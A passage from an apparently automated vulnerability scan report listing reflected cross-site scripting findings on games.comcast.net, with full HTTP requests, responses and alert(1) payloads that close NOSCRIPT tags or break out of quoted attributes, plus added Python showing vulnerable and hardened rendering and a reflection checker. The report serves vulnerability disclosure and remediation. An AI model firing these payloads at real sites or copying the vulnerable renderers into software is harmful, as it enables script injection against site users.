GET /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:59 GMT
Server: Apache
Set-Cookie: ssid=l660jf072c1iro0jfao7h6jer0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Content-Length: 622
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc was not found on this server.</p>
...[SNIP]...

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between NOSCRIPT tags. The payload b01e2</noscript><script>alert(1)</script>694556b43e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:58 GMT
Server: Apache
Set-Cookie: ssid=usip5la3bnjejo41vpfbf4gv61; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Content-Length: 623
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 was not found on this server.</p>
...[SNIP]...

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3d790</noscript><script>alert(1)</script>7026214fdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:22 GMT
Server: Apache
Set-Cookie: ssid=dm4oq6gddukhq03ff53cru3dh1; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Content-Length: 681
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30 was submitted in the REST URL parameter 1. This input was echoed as 629ec"><img src=a onerror=alert(1)>3d0a426c30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:11 GMT
Server: Apache
Set-Cookie: ssid=apef68r0bna5m4av39ircrrjh5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: affiliate_code=t_03cm629ec%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3d0a426c30; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/
Content-Length: 29905

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ftag/dip_nt_en/t_03cm629ec"><img src=a onerror=alert(1)>3d0a426c30/VictorianMysteries_WiW.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...
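Findings 2.36 through 2.44 cover three distinct output contexts. The page flow error at digitalvoice.comcast.net drops the requested action path into a <td> as plain text; the games.comcast.net 404 page echoes the raw request URI inside <noscript>; and the product page copies the first path segment (the affiliate code) into a double-quoted href. The fix is the same principle applied per context: entity-encode for text, which also turns the attacker's </noscript> into inert characters so the element cannot be closed early, and URL-encode then attribute-encode for the href so neither a quote nor an angle bracket survives. Note also the second Set-Cookie: affiliate_code header in 2.44, which persists the tainted segment. That value is percent-encoded, so it is not header injection, but whether the cookie is later read back and reflected unencoded is a check worth making before closing the ticket; the report does not test it.

The Python below is an added example, not code from the report or from either site. The vulnerable renderers reconstruct the echoed fragments shown above (the surrounding markup and the d.trymedia.com path are simplified stand-ins), the hardened ones apply the context-appropriate encoding, and injected_script() judges the result by parsing it the way a browser would rather than by searching for the payload string.

```python
"""Added example: vulnerable vs hardened rendering for the three reflection
contexts in findings 2.36-2.44, plus a parser-based check for injected script.
Templates are reconstructions of the echoed fragments, not the sites' code."""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Canaries modelled on the report's payloads (constructed, not captured).
TEXT_PAYLOAD = 'c0534<script>alert(1)</script>172078c0b3d'
NOSCRIPT_PAYLOAD = 'cf871</noscript><script>alert(1)</script>4d1710b7efc'
ATTR_PAYLOAD = '629ec"><img src=a onerror=alert(1)>3d0a426c30'


# --- context 1: plain text between tags (2.36-2.40, page flow error) -------
def pageflow_error_vulnerable(action_path):
    return f'<tr><td>{action_path}</td></tr>'


def pageflow_error_safe(action_path):
    # html.escape encodes & < > " ' so the value can never open a tag
    return f'<tr><td>{html.escape(action_path)}</td></tr>'


# --- context 2: text inside <noscript> (2.41-2.43, 404 error document) -----
def not_found_vulnerable(request_uri):
    return ('<noscript><p>The requested URL ' + request_uri +
            ' was not found on this server.</p></noscript>')


def not_found_safe(request_uri):
    # Once '<' is '&lt;', the attacker's '</noscript>' is plain text: the
    # element is not closed early and no <script> element is ever parsed
    return ('<noscript><p>The requested URL ' + html.escape(request_uri) +
            ' was not found on this server.</p></noscript>')


# --- context 3: double-quoted attribute value (2.44, download href) --------
def download_link_vulnerable(affiliate):
    return (f'<a href="http://d.trymedia.com/d/ftag/dip_nt_en/{affiliate}'
            f'/game.rga">Download</a>')


def download_link_safe(affiliate):
    # Encode for the URL first (" > < become %22 %3E %3C), then for the
    # attribute; quote=True makes html.escape encode the closing quote too
    segment = html.escape(quote(affiliate, safe=''), quote=True)
    return (f'<a href="http://d.trymedia.com/d/ftag/dip_nt_en/{segment}'
            f'/game.rga">Download</a>')


class _ScriptFinder(HTMLParser):
    """Collects the tag names and on* handlers a browser would build."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [k for k, _ in attrs if k.lower().startswith('on')]


def injected_script(fragment):
    """True if parsing yields a <script> element or any on* event handler.
    This checks what the parser builds, which is what decides execution,
    instead of searching for the raw payload string."""
    p = _ScriptFinder()
    p.feed(fragment)
    p.close()
    return 'script' in p.tags or bool(p.handlers)


if __name__ == '__main__':
    cases = [
        ('td text', pageflow_error_vulnerable, pageflow_error_safe, TEXT_PAYLOAD),
        ('noscript', not_found_vulnerable, not_found_safe, NOSCRIPT_PAYLOAD),
        ('attribute', download_link_vulnerable, download_link_safe, ATTR_PAYLOAD),
    ]
    for name, bad, good, payload in cases:
        print(f'{name:10} vulnerable={injected_script(bad(payload))} '
              f'hardened={injected_script(good(payload))}')
```

The attribute case needs both layers: html.escape alone would leave a literal space and parenthesis inside a URL, and URL-encoding alone would not stop a `&quot;`-style entity from being decoded by the attribute parser. Encoding for the URL first and then for the attribute is the order the browser reverses.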

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 3f34f</noscript><script>alert(1)</script>d734ce584e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache
Set-Cookie: ssid=lpsscof3a2tsmp7o30vko4vvl5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Content-Length: 687
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed was submitted in the REST URL parameter 1. This input was echoed as 5ffd8"><img src=a onerror=alert(1)>9464f5786ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:12 GMT
Server: Apache
Set-Cookie: ssid=qb2rqr3dv4la5or8978jl0edt0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: affiliate_code=t_03cm5ffd8%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9464f5786ed; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/
Content-Length: 71040

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-stri
...[SNIP]...
<img src="http://cdn.media.trymedia.com/affiliate-files/t_03cm5ffd8"><img src=a onerror=alert(1)>9464f5786ed/images/GPpromo.gif" alt="GamePass - Get a FREE Game Now! Sign up for GamePass and receive a FREE game now, a FREE game every month and $5 off all additional GamePass games!" />
...[SNIP]...
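Finding 2.46 repeats the 2.44 pattern, including the affiliate_code cookie that carries the payload in urlencoded form (spaces as +, the PHP urlencode convention). The report states what was echoed but not how the scanner arrives at the "Issue detail" wording: it searches the response for the canary it sent, reports each verbatim hit with the HTML context around it, and treats an encoded echo, such as the cookie, as no finding at all. The Python below is an added example, not the scanner's code or anything from the page. It runs that search over two constructed responses modelled on the 404 and 200 responses above (stand-ins, not captured traffic), classifies the context of each raw reflection with a deliberately simple heuristic, and reports the cookie echo separately as encoded.

```python
"""Added example: locate a canary in a raw HTTP response, classify the HTML
context of each unmodified reflection, and report encoded echoes in headers.
Both responses are constructed stand-ins for the report's 404 and 200 pages."""
import re
from urllib.parse import quote, quote_plus

NOSCRIPT_CANARY = '3d790</noscript><script>alert(1)</script>7026214fdcc'
ATTR_CANARY = '629ec"><img src=a onerror=alert(1)>3d0a426c30'

RESPONSE_404 = (
    'HTTP/1.1 404 Not Found\r\n'
    'Content-Type: text/html; charset=ISO-8859-1\r\n'
    '\r\n'
    '<html><body><noscript><p>The requested URL /t_03cm' + NOSCRIPT_CANARY +
    '/s1/DownloadableGames was not found on this server.</p></noscript>'
    '</body></html>'
)

RESPONSE_200 = (
    'HTTP/1.1 200 OK\r\n'
    'Set-Cookie: affiliate_code=t_03cm' + quote_plus(ATTR_CANARY) + '; path=/\r\n'
    'Content-Type: text/html; charset=ISO-8859-1\r\n'
    '\r\n'
    '<html><body><a href="http://d.trymedia.com/d/ftag/t_03cm' + ATTR_CANARY +
    '/game.rga">Download</a></body></html>'
)


def split_response(raw):
    """Return (status line, [(header, value), ...], body)."""
    head, _, body = raw.partition('\r\n\r\n')
    lines = head.split('\r\n')
    headers = [tuple(p.strip() for p in line.split(':', 1))
               for line in lines[1:] if ':' in line]
    return lines[0], headers, body


def body_context(body, pos):
    """Classify the HTML context at offset pos from the text before it.
    Heuristic only: a real scanner tokenises; this looks at the last '<' and
    '>' and counts quotes inside an unclosed tag."""
    before = body[:pos]
    last_lt, last_gt = before.rfind('<'), before.rfind('>')
    if last_lt > last_gt:
        # inside a tag: an odd number of double quotes since '<' means the
        # position is inside a double-quoted attribute value
        in_quotes = before[last_lt:].count('"') % 2 == 1
        return 'attribute (double-quoted)' if in_quotes else 'tag'
    noscript = re.findall(r'<(/?)noscript\b', before, re.I)
    if noscript and noscript[-1] == '':
        return 'text between NOSCRIPT tags'
    return 'plain text between tags'


def find_reflections(raw, canary):
    """List (where, how) for every echo of canary in headers and body."""
    _, headers, body = split_response(raw)
    hits = []
    for name, value in headers:
        if canary in value:
            hits.append((name, 'unmodified'))
        elif quote_plus(canary) in value or quote(canary, safe='') in value:
            hits.append((name, 'URL-encoded'))
    start = 0
    while (pos := body.find(canary, start)) != -1:
        hits.append(('body', 'unmodified in ' + body_context(body, pos)))
        start = pos + len(canary)
    return hits


if __name__ == '__main__':
    for label, raw, canary in (('404', RESPONSE_404, NOSCRIPT_CANARY),
                               ('200', RESPONSE_200, ATTR_CANARY)):
        for where, how in find_reflections(raw, canary):
            print(f'{label}: {where}: {how}')
```

An unmodified hit in a header would be the CWE-113 case from section 1 of this report; an encoded header echo like the affiliate_code cookie is logged but not flagged, which is exactly the distinction the scanner drew here.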

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload bc143</noscript><script>alert(1)</script>eef9c1bbfed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:53 GMT
Server: Apache
Set-Cookie: ssid=kg24oua210erku2s7qg3rvkr76; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Content-Length: 624
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b97f0</noscript><script>alert(1)</script>63f4f408e40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:10:07 GMT
Server: Apache
Set-Cookie: ssid=lj62dj8ljo6i9b7n8stg34sr70; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Content-Length: 630
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb was submitted in the REST URL parameter 1. This input was echoed as 71d13"><img src=a onerror=alert(1)>25e360604eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:06 GMT
Server: Apache
Set-Cookie: ssid=9kfocedqu60qtq9gs61t22ojc3; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: affiliate_code=t_03cm71d13%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E25e360604eb; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/
Content-Length: 30063

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/terminalstudio/dip_60m_en/t_03cm71d13"><img src=a onerror=alert(1)>25e360604eb/AtlantisBundle.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cad9b</noscript><script>alert(1)</script>6d1d2cde714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:17 GMT
Server: Apache
Set-Cookie: ssid=57ia8n32bvthj735oc230jm0g5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Content-Length: 663
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 23787</noscript><script>alert(1)</script>34b01fab478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:34 GMT
Server: Apache
Set-Cookie: ssid=dkrukt8915gi49v33gjhl0cq40; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Content-Length: 669
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56 was submitted in the REST URL parameter 1. This input was echoed as f3063"><img src=a onerror=alert(1)>6a42dc0ab56 in the application's response.

